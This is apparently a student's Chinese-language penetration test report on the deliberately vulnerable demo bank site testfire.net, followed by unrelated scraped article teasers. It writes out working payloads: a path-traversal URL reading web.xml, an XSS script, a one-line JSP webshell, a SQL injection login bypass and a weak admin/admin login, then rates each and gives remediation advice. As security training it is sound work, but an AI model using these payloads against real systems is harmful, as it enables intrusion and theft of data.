www.testfire.nets渗透测试报告
www.testfire.nets渗透测试报告
一、测试综述
1.1.测试⽬的
通过实施针对性的渗透测试,发现testfire.net⽹站的安全漏洞,锻炼自己的渗透水平
1.2.测试范围
域名:www.testfire.net
IP:65.61.137.117
测试时间: 2023年11月21日
说明: 本次使用的渗透过程中使用的ip:192.168.85.128
1.3.数据来源
通过漏洞扫描和⼿动分析获取相关数据。
二、测试工具
根据测试的范围,本次渗透测试可能⽤到的相关⼯具列表如下:
(1)在线域名转化IP:在线IP查询工具-支持本机外网,域名_蛙蛙工具 (iamwawa.cn)
(2)Nmap: 进行目标端口的扫描
(3)dirsearch: 进行网站目录的扫描
(4)Burp抓包
三、渗透过程
3.1 信息收集
使用ping命令发现对方的ttl为105 可预知对方的操作系统为windows
使用nmap进行端口扫描 65.61.137.117
我们发现只有80网页端口进行开放,说明我们目前根据这个结果只能进行网页的渗透
根据这点我们使用dirsearch进行网站目录扫描
因为扫出的目录比较多,但很明显存在一个后台登入路径/admin 然后还可能存在一个目录穿越读取文件的漏洞 ,针对这个,我们还是先进入后台
所以说信息收集总结就是:
目标 www.testfire.net 服务器地址:65.61.137.117,开启了80 HTTP、443 HTTPS服务,可能存在后台登入等漏洞
3.2 漏洞挖掘
3.2.1 后台管理员弱口令登入漏洞
我们进入后台发现存在弱口令admin/admin直接可以进入后台
我们成功进入后台后,我们就可以进行下一步的渗透了
3.2.2 index.jsp路径下存在 web.xml配置文件泄露漏洞
首先我们在后台源码发现了如下路径
我们访问看看这个页面然后进行下一步的测试
经过测试,我们发现读取/etc/passwd等重要文件不行,说明网站的防护还是可以的
不过测试发现服务器为服务器信息:windows-Apache Tomcat/7.0.92。
但是经过努力,发现他是直接可以读取web.xml 的网站配置信息
Payload:http://65.61.137.117/index.jsp?content=../WEB-INF/web.xml
通过这个我们得知了配置信息后 可以进行后续的准备更高级的攻击。
3.2.3 search框存在xss漏洞
在search框进行搜索的时候,发现存在xss漏洞
Payload:<script>alert("2100101628xuwenlong")</script>
点击go 输出为 2100101628xuwenlong
通过XSS漏洞,可以获取用户 Cookie 等信息,以实现进一步渗透。如果是存储型XSS,那么还可以通过设置钓鱼登录框,将用户填写的账号、密码表单信息发送到攻击者所指定的网络位置。
3.2.4 反馈页面存在任意文件上传漏洞
我们进入反馈页面 发现能够上传任意文件 如下
我们尝试修改文件内容为一句话 JSP webshell,
木马内容为:
<%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}%> 然后上传wenda.jsp
发现能够上传 却找不到文件上传的路径,由于是测试网站,甚至怀疑这里并没有做实际的保存工作,而只是返回了结果信息。
3.2.5 登入存在sql注入
Payload:
username:a 'OR 1=1--+
密码 随意
登入成功
以上就是该网站的漏洞挖掘过程
四、漏洞评级
(1)后台弱口令登入管理员漏洞:中危
管理员用户功能不是很多,主要包括可以管理用户(更改管理员密码、创建用户)、信息查询(可以尝试进行SQL注入)、转账功能(此处无二次验证功能,在实际网站中,敏感业务操作设计应引入二次鉴权机制)
(2)index.jsp路径下存在 web.xml配置文件泄露漏洞 :中危
如果文件目录下有更多的敏感信息,那么危害会更大,攻击者根据配置信息,可采用远程攻击网站造成网站的破坏
(3)search框存在xss漏洞: 低危
通过XSS漏洞,可以获取用户 Cookie 等信息,以实现进一步渗透。
如果是存储型XSS,那么还可以通过设置钓鱼登录框,将用户填写的账号、密码表单信息发送到攻击者所指定的网络位置。
(4)反馈页面存在任意文件上传漏洞 : 低危
因为可能是个测试网站,没有文件路径,所以但是还是能上传一句话木马,攻击者可通过一些攻击工具像weblogic实现不需要路径的getshell,来进行提权
(5)登入存在sql注入:高危
用户通过发现注入后可采取sqlmap进行网站的数据库爬取,造成数据的流失
五、修复建议
1.防止SQL注入,最有效的方法就是限制输入、参数化传递 用户提交的数据,显然这里并没有进行有效防护,测试发现登录页面存在SQL注入漏洞
2.后台弱口令应该设置验证码或者强口令登入
3.防止文件路径遍历漏洞的最有效方法是避免将用户提供的输入完全传递给文件系统API。
如果认为不可避免的是将用户提供的输入传递给文件系统API,则应同时使用两层防御,以防止受到攻击:
(1)应用程序应在处理之前验证用户输入。理想情况下,验证应与允许值的白名单进行比较。如果所需的功能无法做到这一点,则验证应验证输入内容仅包含允许的内容,例如纯字母数字字符。
(2)验证提供的输入后,应用程序应将输入附加到基本目录,并使用平台文件系统API规范化路径。验证规范化路径以预期的基本目录开头。
4.修复对web.xml访问权限 可直接删除docs目录和examples目录
5.XSS漏洞修复课采取对输入的数据进行HTML转义,使其不会识别为可执行脚本,和白名单过滤等方法
6.文件上传漏洞给出的修复建议为:
1. 服务器配置:
2. 在服务端对上传文件进行检查:
3. 对于图片文件进行二次渲染、压缩, 避免图片写马。
4. 校验失败后,记录错误日志信息,内容至少包括时间、用户、IP、操作内容、校验失败的
相关文章:
www.testfire.nets渗透测试报告
www.testfire.nets渗透测试报告 一、测试综述 1.1.测试⽬的 通过实施针对性的渗透测试,发现testfire.net⽹站的安全漏洞,锻炼自己的渗透水平 1.2.测试范围 域名:www.testfire.net IP:65.61.137.117 测试时间: 2023年11月…...
多模态大一统:通向全模态学习和通用人工智能的未来之路
随着AI技术的不断发展,研究者们正试图构建一种真正通用的人工智能,它能像人们那样以统一的方式处理和理解多种模态的信息。多模态大一统是这一愿景的关键,它旨在开启全模态LLM(深度学习语言模型)和通用AI时代的大门。在…...
实用篇-ES-DSL查询文档
数据的存储不是目的,我们希望从海量的酒店数据中检索出需要的信息,这就是ES的搜索功能 官方文档: https://elastic.co/guide/en/elasticsearch/reference/current/query-dsl.html#query-dsl。DSL是用来查询文档的 Elasticsearch提供了基于JSON的DSL来定…...
Nacos配置管理
将配置交给Nacos管理的步骤 1、在Nacos中添加配置文件 2、在微服务中引入nacos的config依赖 3、在微服务中添加bootstrap.yml,配置nacos地址、当前环境、服务名称、文件后缀名。这些决定了程序启动时去nacos读取哪个文件 Nacos配置更改后,微服务可以实…...
【前端学java】Java中的异常处理(15)完结
往期回顾: 【前端学java】JAVA开发的依赖安装与环境配置 (0)【前端学java】java的基础语法(1)【前端学java】JAVA中的packge与import(2)【前端学java】面向对象编程基础-类的使用 (…...
深入理解MySQL存储引擎、InnoDB与MyISAM的比较以及事务处理机制
介绍 MySQL是一款强大而灵活的关系型数据库管理系统,它支持多种存储引擎,每个引擎都有其独特的特点和适用场景。在本篇博客中,我们将深入探讨MySQL存储引擎的种类、InnoDB与MyISAM的区别,以及事务的概念及其在MySQL中的实现方式。…...
webpack 中,filename 和 chunkFilename 的区别
filename filename 是一个很常见的配置,就是对应于 entry 里面的输入文件,经过webpack打包后输出文件的文件名。比如说经过下面的配置,生成出来的文件名为 index.min.js。 chunkFilename chunkFilename 指未被列在 entry 中,却…...
gitlab 实战
一.安装依赖 yum install -y curl policycoreutils-python openssh-server perl 二.安装gitlab yum install gitlab-jh-16.0.3-jh.0.el7.x86_64.rpm 三.修改下面的 vim /etc/gitlab/gitlab.rbexternal_url http://192.168.249.156 四.初始化 gitlab-ctl reconfigure 五.查看状…...
openGauss学习笔记-128 openGauss 数据库管理-设置透明数据加密(TDE)
文章目录 openGauss学习笔记-128 openGauss 数据库管理-设置透明数据加密(TDE)128.1 概述128.2 前提条件128.3 背景信息128.4 密钥管理机制128.5 表级加密方案128.6 创建加密表128.7 切换加密表加密开关128.8 对加密表进行密钥轮转 openGauss学习笔记-12…...
Redis从入门到精通(三)-高阶篇
文章目录 0. 前言[【高阶篇】3.1 Redis协议(RESP )详解](https://blog.csdn.net/wangshuai6707/article/details/132742584)[【高阶篇】3.3 Redis之底层数据结构简单动态字符串(SDS)详解](https://blog.csdn.net/wangshuai6707/article/details/131101404)[【高阶篇】3.4 Redis…...
线性表--队列-1
文章目录 主要内容一.队列基础练习题1.用链式存储方式的队列进行删除操作时需要 ( D ).代码如下(示例): 2.若以1,2,3,4作为双端队列的输入序列,则既不能由输入受限的双端队列得到,又不能由输出受限的双端队列得到的输出序列是( C …...
【开题报告】基于uni-app的汽车租赁app的设计与实现
1.项目背景及意义 项目背景: 随着人们生活水平的提高,汽车租赁服务在城市中变得越来越普及。传统的租车方式存在一些问题,比如租车流程繁琐、费用不透明、选择有限等。因此,开发一款基于uni-app的汽车租赁app成为了满足用户需求…...
Java实现围棋算法
围棋是一种源自中国的棋类游戏,也是世界上最古老、最复杂的棋类游戏之一。该游戏由黑白两方交替放置棋子在棋盘上进行,目的是将自己的棋子占据更多的空间,并将对手的棋子围死或吃掉,最终获得胜利。围棋不仅是一种游戏,…...
python -opencv 边缘检测
python -opencv 边缘检测 边缘检测步骤: 第一步:读取图像为灰度图 第二步:进行二值化处理 第三步:使用cv2.findContours对二值化图像提取轮廓 第三步:将轮廓绘制到图中 代码如下: from ctypes.wintypes import SIZ…...
Hadoop-- hdfs
1、HDFS中的三个进程:NameNode(NN)、DataNode(DN)、SecondNameNode(SNN) 2、NameNode(NN) 1、作用: 1、接收客户端的一个读、写的服务,在namenode上存储了数据文件和datanode的映射的关系。 …...
《论文阅读》CAB:认知、情感和行为的共情对话生成 DASFAA 2023
《论文阅读》CAB:认知、情感和行为的共情对话生成 前言摘要相关知识CVAE 条件变分自编码器最大最小归一化模型架构1.获取 Representation2.Prior Network and Recognition Network (Affection)3.Knowledge Acquisition and Fusion (Cognition)4.Dialogue Act Predictor and Re…...
审计dvwa高难度命令执行漏洞的代码,编写实例说明如下函数的用法
审计dvwa高难度命令执行漏洞的代码 ,编写实例说明如下函数的用法 代码: <?phpif( isset( $_POST[ Submit ] ) ) {// Get input$target trim($_REQUEST[ ip ]);// Set blacklist$substitutions array(& > ,; > ,| > ,- > ,$ …...
国科大数据挖掘期末复习——聚类分析
聚类分析 将物理或抽象对象的集合分组成为由类似的对象组成的多个类的过程被称为聚类。由聚类所生 成的簇是一组数据对象的集合,这些对象与同一个簇中的对象彼此相似,与其他簇中的对象相异。 聚类属于无监督学习(unsupervised learning&…...
【经验之谈·高频PCB电路设计常见的66个问题】
文章目录 1、如何选择PCB 板材?2、如何避免高频干扰?3、在高速设计中,如何解决信号的完整性问题?4、差分布线方式是如何实现的?5、对于只有一个输出端的时钟信号线,如何实现差分布线?6、接收端差…...
科大讯飞 vue.js 语音听写流式实现 全网首发
组件下载 还是最近的需求,页面表单输入元素过多,需要实现语音识别来由用户通过朗读的方式向表单中填写数据,尽量快的、高效的完成表单数据采集及输入。 国内科大讯飞在语音识别方面的建树还是有目共睹,于是还是选择了科大讯飞的平…...
单北斗变形监测应用在GNSS位移监测中的创新与实践
该监测方案在GNSS位移监测中实现了对位移数据的高精度获取。核心在于使用专用传感器,结合多频信号进行实时处理来捕捉结构的变形。它在桥梁和地质灾害监测等场景中,能快速给出预警,帮助发现潜在风险。为了让系统稳定运行,合适的参…...
OnmyojiAutoScript:阴阳师手游智能自动化脚本终极指南
OnmyojiAutoScript:阴阳师手游智能自动化脚本终极指南 【免费下载链接】OnmyojiAutoScript Onmyoji Auto Script | 阴阳师脚本 项目地址: https://gitcode.com/gh_mirrors/on/OnmyojiAutoScript 阴阳师手游的日常任务繁重,从御魂副本到百鬼夜行&a…...
苹果手机扣图片换背景用什么工具?2026年最实用的免费抠图方案
最近有很多小伙伴问我,用苹果手机怎样才能快速扣图换背景。说实话,这个问题我也被问过不少次,尤其是在做证件照、商品摄影或者简单的图片编辑时,一款好用的抠图工具真的能省不少事儿。今天我就把自己用过的各种方案都整理出来&…...
从1982年智能仪器到现代数字万用表:设计演进与选型实践
1. 项目概述:一次关于智能仪器与数字万用表的深度回溯如果你是一位电子工程师,或者任何需要和电路、信号打交道的人,你的工作台上、实验室的机架里,甚至生产线上,最不可或缺、最沉默寡言的伙伴是什么?十有八…...
Python 爬虫反爬突破:文字验证码 OCR 识别开发
前言 传统英数混合文字验证码是早期网站最基础的人机校验形式,至今仍大量应用于中小型站点、后台管理系统、老旧业务平台的登录及接口防护场景。此类验证码通过字符扭曲、粘连、旋转、噪点填充、干扰线条、彩色渐变背景等方式增加机器识别难度,依靠人工…...
智慧树全自动刷课神器:Autovisor三步实现无人值守学习
智慧树全自动刷课神器:Autovisor三步实现无人值守学习 【免费下载链接】Autovisor 2025智慧树刷课脚本 基于Python Playwright的自动化程序 [有免安装版] 项目地址: https://gitcode.com/gh_mirrors/au/Autovisor 还在为智慧树网课而烦恼吗?每天需…...
【大模型推理加速终极指南】:奇点智能大会首发的7大工业级优化方案,错过再等一年
更多请点击: https://intelliparadigm.com 第一章:大模型推理加速方案:奇点智能大会 在2024年奇点智能大会上,多家前沿AI基础设施团队联合发布了面向千卡级集群的大模型推理加速新范式——以“动态张量分片硬件感知调度”为核心&…...
下一代 AI 终端神器开源,暴涨 4.6 万 Star!
过去一两年,Claude Code、Codex、Gemini CLI 这些 AI 编程工具不断涌现。写代码、改 Bug、跑测试,越来越多编程工作只需要在终端窗口即可完成。大家便寻找趁手的 AI 终端工具,其中 Warp 是最受欢迎的工具之一,拥有了近百万用户。而…...
Proteus系统:基于DICE的移动设备日志实时保护方案
1. Proteus系统概述Proteus是一个基于DICE(Device Identifier Composition Engine)架构的实时日志保护系统,专为解决移动设备日志中的敏感信息保护问题而设计。在Android生态系统中,应用日志往往包含大量PII(个人身份信…...
)
用Java+SSM+Vue2从零搭建一个Web版医学影像系统(含Dicom文件处理全流程)
用JavaSSMVue2从零搭建Web版医学影像系统(含Dicom文件处理全流程) 医疗信息化领域的技术门槛往往让开发者望而却步,但当你掌握Dicom文件处理的核心技术后,一切都会变得清晰起来。本文将带你从零开始,用最主流的Java技术…...